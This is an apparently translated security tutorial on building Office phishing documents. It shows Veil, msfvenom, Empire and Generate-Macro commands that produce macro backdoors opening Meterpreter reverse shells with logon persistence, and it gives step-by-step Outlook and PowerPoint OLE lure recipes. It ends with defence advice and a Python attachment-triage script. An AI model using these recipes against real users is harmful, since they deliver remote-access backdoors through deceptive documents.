Evi1cg · 2016/03/03 at 10:30
Office is one of the most widely used software suites on the Windows platform, and more and more APT attacks are carried out by constructing malicious Office files; it remains an attack method with a high success rate. The most covert and effective way to attack the Office suite is through a 0day, but that has drawbacks: not everyone has 0days, and the xdays that have been published usually only work against certain fixed versions of Office. This article therefore does not focus on xdays. Instead it summarizes the known ways of constructing Office phishing files, in the hope that it helps people learning offensive security, and that readers can use it to recognize and avoid such attacks.
The following tests were run on Windows 10 with a security guard (endpoint protection) product installed.
0x00 Office macros
A macro is a feature of the Microsoft Office suite designed to automate repetitive work: a commonly used sequence of actions is written in a simple syntax (VBA), and a ready-made macro can then be run automatically to complete a specific task without the user repeating the same steps by hand. The intent was to automate tasks within user documents, but the same mechanism executes arbitrary code, which is why macros are a favourite delivery vehicle. The MWI-5 analysis (an attack campaign that used Office macros to download keyloggers) documents one such case. Below, several well-known tools for building macro backdoors are introduced.
1. Veil
Using the powershell/shellcode_inject/virtual payload, choose to generate directly:
Enter a name and generate:
Then you need to download a conversion script:
```bash
git clone https://github.com/khr0x40sh/MacroShop.git
```
Convert it to VBA using the downloaded Python script:
```bash
# run from the cloned MacroShop directory
python macro_safe.py /usr/share/veil-output/source/test.bat
```
Then add the generated content to the Office file as a macro. When creating the macro, set its location to the current document:
Next, in the Project pane select Microsoft Word Objects -> ThisDocument, choose Document -> Open, and paste in the generated code. The code after saving is shown below:
Note that the script builds its macro around a workbook-open event by default (it targets spreadsheets), so only the function body is pasted into Document_Open here; check that the pasted code is complete.
Then save it as a Word macro-enabled document (.docm) or as a .doc document.
Start the listener:
```bash
# from the Veil-Evasion directory
msfconsole -r /usr/share/veil-output/handlers/test_handler.rc
```
Opening the Word document shows the prompt:
Click Enable Content and a Meterpreter session is returned.
2. Nishang
The use of Nishang for this purpose was covered earlier in "Effective phishing with the PowerShell client".
3. Metasploit
Msf, the staple tool, can also generate a VBA backdoor with the following command:
```bash
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.100 lport=8888 -e x86/shikata_ga_nai exitfunc=thread -f vba > vcode.txt
```
4. Empire
```
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > execute
(Empire: listeners) > usestager macro
(Empire: stager/macro) > set Listener test
(Empire: stager/macro) > set OutFile /tmp/macro.txt
(Empire: stager/macro) > execute
[*] Stager output written out to: /tmp/macro.txt
```
Write the code into a macro; when it executes, a session is returned:
5. Generate-Macro
```bash
git clone https://github.com/enigma0x3/Generate-Macro.git
```
The usage is as follows:
```powershell
PS C:\Users\Evi1cg\Desktop> . .\Generate-Macro.ps1
Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version): https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-Shellcode.ps1
Enter IP Address: 192.168.2.111
Enter Port Number: 6666
Enter the name of the document (Do not include a file extension): Macro
--------Select Attack---------
1. Meterpreter Shell with Logon Persistence
2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin)
3. Meterpreter Shell with Alternate Data Stream Persistence
4. Meterpreter Shell with Scheduled Task Persistence
------------------------------
Select Attack Number & Press Enter: 1
--------Select Payload---------
1. Meterpreter Reverse HTTPS
2. Meterpreter Reverse HTTP
------------------------------
Select Payload Number & Press Enter: 2
Saved to file C:\Users\Evi1cg\Desktop\Macro.xls
Clean-up Script located at C:\Users\Evi1cg\Desktop\RegistryCleanup.ps1
```
Opening the Excel file generates a Meterpreter session:
At the same time it creates an auto-start backdoor:
The persistence is the Load value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows (a legacy per-user autorun location processed at logon, which is worth checking during incident response):
To remove the backdoor, run the generated cleanup script:
```powershell
PS C:\Users\Evi1cg\Desktop> . .\RegistryCleanup.ps1
[*]Successfully Removed config.vbs from C:\Users\Public
[*]Successfully Removed Malicious Load entry from HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
[!] Path not valid
[!] Path not valid
```
The other persistence options are left for interested readers to try for themselves.
Other macro backdoor scripts include:
- Old-Powershell-payload-Excel-Delivery
- OutlookPersistence
- exe2vba.rb
- unicorn
0x01 Office OLE
OLE is short for Object Linking and Embedding, a technology for embedding part of one file inside another file. This kind of attack is also frequently used in APT campaigns. Its advantage over macros is that the user does not need to enable anything: the embedded object can run a command even when macros are disabled, so macro-related policies alone do not stop it.
1. Outlook OLE
@Three good students previously introduced this in the Zone ("Introduction to Outlook OLE phishing email use"). I tested it on Win10 + Office 2016; here is a brief introduction. The steps to make this phishing file are as follows:
- Create a new message and select RTF in the text formatting area:
- Select Insert -> Object -> Package and tick Display as icon:
- Change the icon to a Word icon and set the caption to an innocuous-looking name:
- Bind the chosen program or script;
- Switch the message format from RTF back to HTML;
- Add other misleading content:
- Save as test.msg;
- Send it to the victim.
After the victim runs it, the following prompt is displayed:
After clicking Yes:
Click Open and the bound program executes:
2. PowerPoint OLE
Phishing with a PowerPoint presentation, again without enabling macros, is done as follows:
- Create a new PowerPoint file;
- Create a VBS script; for a simple demonstration, just pop a message box:
```vbscript
MsgBox("test")
```
- Drag the VBS file into the PPT;
- Animate the VBS object: Animations -> OLE Action Verbs and select Activate, as shown below:
- Open the Animation Pane -> Effect Options:
- Under Timing, set Start to With Previous (run at the same time as the previous animation):
- Add content to the PPT;
- Save as a slideshow file (.pps or .ppsx);
- Send it to the victim.
When the victim opens it, the following prompt is displayed:
Click Open and the script executes.
This article does not go into how to build a VBS backdoor; there are many approaches to collect, and for more fun see JavaScript Phishing.
VBS scripts can be encoded (obfuscated, not truly encrypted) with the "Encode and Decode a VB" script.
0x02 Defense
Attacks via Office macros and OLE objects have existed since the 1990s but are still exploited today. How can such attacks be better defended against?
- Train employees not to enable macros, not to click OK on such prompts, and not to download unknown files.
- Configure Group Policy; in a domain, the Office administrative templates can be deployed in bulk. Set "Disable all except digitally signed macros":
See here for more details. Office 2016 also added the policy "Block macros from running in Office files from the Internet", which blocks macros in documents carrying the Mark of the Web without giving the user an Enable Content button; note that neither setting affects the OLE attacks in 0x01.
- Pay special attention to files with the .msg, .rtf, and .pps suffixes;
- Use EMET; if you don't know what EMET is, look here. (EMET has since been retired by Microsoft; its mitigations continue as Exploit Protection in Windows Defender Exploit Guard on Windows 10.)
The methods above come from "It's time to secure Microsoft Office". For the security settings for planning VBA macros in Office, see here.
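To make the "pay special attention to .msg, .rtf and .pps" advice mechanical, the following is an added example (not code from the original article) of a static triage script for mail attachments. It checks the indicators from the macro section (a vbaProject.bin part or vbaProject content type in an OOXML container) and from the OLE section (embedded objects under embeddings/, an RTF body carrying \object and \objdata, the legacy OLE2 compound-file signature, and the risky extensions). All sample files are constructed in memory; legacy OLE2 files (.doc, .xls, .pps, .msg) are only flagged as containers, since their streams need a real OLE parser such as oletools.

```python
"""Static triage of mail attachments for the Office phishing indicators
discussed above. Added example, not code from the original article.
Sample files below are constructed in memory (not real malware)."""
import io
import os
import re
import zipfile

# Magic of the legacy OLE2 compound file format (.doc, .xls, .pps, .msg)
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Extensions the article singles out, plus the macro-enabled OOXML variants
RISKY_EXT = {".msg", ".rtf", ".pps", ".ppsx", ".ppsm",
             ".docm", ".dotm", ".xlsm", ".xlam", ".pptm"}
# Content type that marks a VBA project part in [Content_Types].xml
VBA_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"
# OOXML part names for a macro project and for embedded OLE objects
MACRO_PART = re.compile(r"^(word|xl|ppt)/vbaProject\.bin$")
EMBEDDING_PART = re.compile(r"^(word|xl|ppt)/embeddings/")


def scan_attachment(name: str, data: bytes) -> dict:
    """Return the indicators found in one attachment (name + raw bytes)."""
    ext = os.path.splitext(name.lower())[1]
    r = {"name": name, "risky_extension": ext in RISKY_EXT,
         "vba_project": False, "embedded_objects": [],
         "ole2_container": False, "rtf_object": False}
    if data.startswith(OLE2_MAGIC):
        # Legacy binary format: macros/objects live in OLE streams, which
        # need a real OLE parser (e.g. oletools); only flag the container here.
        r["ole2_container"] = True
    elif data.lstrip().startswith(b"{\\rtf"):
        # An RTF body with an embedded OLE object carries \object ... \objdata
        r["rtf_object"] = b"\\object" in data and b"\\objdata" in data
    elif data.startswith(b"PK"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
                r["vba_project"] = any(MACRO_PART.match(n) for n in names)
                if "[Content_Types].xml" in names and \
                        VBA_CONTENT_TYPE in z.read("[Content_Types].xml"):
                    r["vba_project"] = True
                r["embedded_objects"] = [n for n in names if EMBEDDING_PART.match(n)]
        except zipfile.BadZipFile:
            pass  # not an OOXML package; nothing to inspect
    r["suspicious"] = (r["vba_project"] or bool(r["embedded_objects"])
                       or r["rtf_object"] or r["risky_extension"])
    return r


def make_ooxml(parts: dict) -> bytes:
    """Build a minimal OOXML-style zip from {part_name: bytes} (test helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for part, content in parts.items():
            z.writestr(part, content)
    return buf.getvalue()


# Constructed samples: a clean .docx, a macro-enabled .docm, a .ppsx with an
# embedded OLE object, an RTF body with an object, and a legacy .doc header.
SAMPLES = {
    "report.docx": make_ooxml({"[Content_Types].xml": b"<Types/>",
                               "word/document.xml": b"<w:document/>"}),
    "invoice.docm": make_ooxml({
        "[Content_Types].xml": b'<Types><Override PartName="/word/vbaProject.bin" '
                               b'ContentType="application/vnd.ms-office.vbaProject"/></Types>',
        "word/document.xml": b"<w:document/>",
        "word/vbaProject.bin": OLE2_MAGIC + b"\x00" * 8}),
    "deck.ppsx": make_ooxml({"[Content_Types].xml": b"<Types/>",
                             "ppt/presentation.xml": b"<p:presentation/>",
                             "ppt/embeddings/oleObject1.bin": OLE2_MAGIC + b"\x00" * 8}),
    "mail.rtf": b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata 0105000002000000}}}",
    "old.doc": OLE2_MAGIC + b"\x00" * 504,
}


def triage(samples: dict = SAMPLES) -> dict:
    """Scan every sample; returns {name: indicators}."""
    return {n: scan_attachment(n, d) for n, d in samples.items()}


if __name__ == "__main__":
    for n, r in triage().items():
        print(f"{n:13} suspicious={r['suspicious']!s:5} vba={r['vba_project']!s:5} "
              f"embedded={r['embedded_objects']} rtf_object={r['rtf_object']} "
              f"ole2={r['ole2_container']}")
```

The zip check is deliberately independent of the file extension, because a renamed .docm is still a macro-enabled package; the extension check, on the other hand, is what catches a .pps slideshow whose OLE action runs on open. Feed scan_attachment the bytes from a mail gateway or quarantine folder and route anything with suspicious=True to manual review or sandboxing.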
0x03 Summary
APT attacks that abuse Office are becoming more and more common. Even without a 0day, we should at least understand and guard against the types of phishing file described above. The construction methods listed here are the ones known to us and may not be exhaustive.
0x04 References
- Phishme.com/powerpoint-…
- Zone.wooyun.org/content/246…
- https:[email protected][email protected]-point-n-click-gui-37f4cbc107d0#.92vne7zgd
- www.youtube.com/watch?v=xm4…
- www.youtube.com/watch?v=j0C…
This article was originally written by Evi1cg and first published on WooYun Drops.